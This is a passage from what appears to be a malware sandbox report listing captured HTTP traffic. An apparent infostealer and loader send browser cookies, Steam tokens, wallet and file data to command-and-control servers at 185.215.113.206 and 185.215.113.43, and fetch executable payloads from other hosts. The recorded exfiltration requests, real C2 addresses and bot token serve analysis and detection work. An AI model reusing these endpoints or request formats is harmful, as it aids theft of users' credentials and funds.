79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 2d 2d 0d 0a Data Ascii: ------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------JKFHIIEHIEGDHJJJKFII--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBFIIIEHCFHJKFHDHDAHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="file"------FCAAEHJDBKJJKFHJEBKF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIJJKKFHIEHJKECGCGCHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 2d 2d 0d 0a Data Ascii: ------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="file"------FIIJJKKFHIEHJKECGCGC--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 31 36 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015169001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 31 37 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015170001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 31 37 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015171001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHIHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/hell911/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECGDBFCBKFIDHIDHDHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 2d 2d 0d 0a Data Ascii: ------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="message"wallets------JKECGDBFCBKFIDHIDHDH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAFBAEBKKEBFIJEBKHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 2d 2d 0d 0a Data Ascii: ------EGIDAFBAEBKKEBFIJEBKContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------EGIDAFBAEBKKEBFIJEBKContent-Disposition: form-data; name="message"files------EGIDAFBAEBKKEBFIJEBK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJKFCBKKJDGDHIDBGIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 2d 2d 0d 0a Data Ascii: ------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="file"------KJKJKFCBKKJDGDHIDBGI--
Source: global traffic	HTTP traffic detected: GET /files/hell911/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHDHJEBGHJKFIECBGCBHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 2d 2d 0d 0a Data Ascii: ------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="message"ybncbhylepme------GDHDHJEBGHJKFIECBGCB--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/hell911/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Thu, 12 Dec 2024 23:33:40 GMTIf-None-Match: "675b72d4-289a00"
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAKHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 2d 2d 0d 0a Data Ascii: ------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BKECFIIEHCFHIECAFBAK--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 31 35 31 37 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1015172001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 41 45 30 32 34 37 44 38 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 2d 2d 0d 0a Data Ascii: ------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="hwid"08AE0247D8BC4158135236------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="build"stok------GCGHCBKFCFBFHIDHDBFC--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIJEHCBAKFCAKFHCGDGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 41 45 30 32 34 37 44 38 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 2d 2d 0d 0a Data Ascii: ------BFIJEHCBAKFCAKFHCGDGContent-Disposition: form-data; name="hwid"08AE0247D8BC4158135236------BFIJEHCBAKFCAKFHCGDGContent-Disposition: form-data; name="build"stok------BFIJEHCBAKFCAKFHCGDG--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: 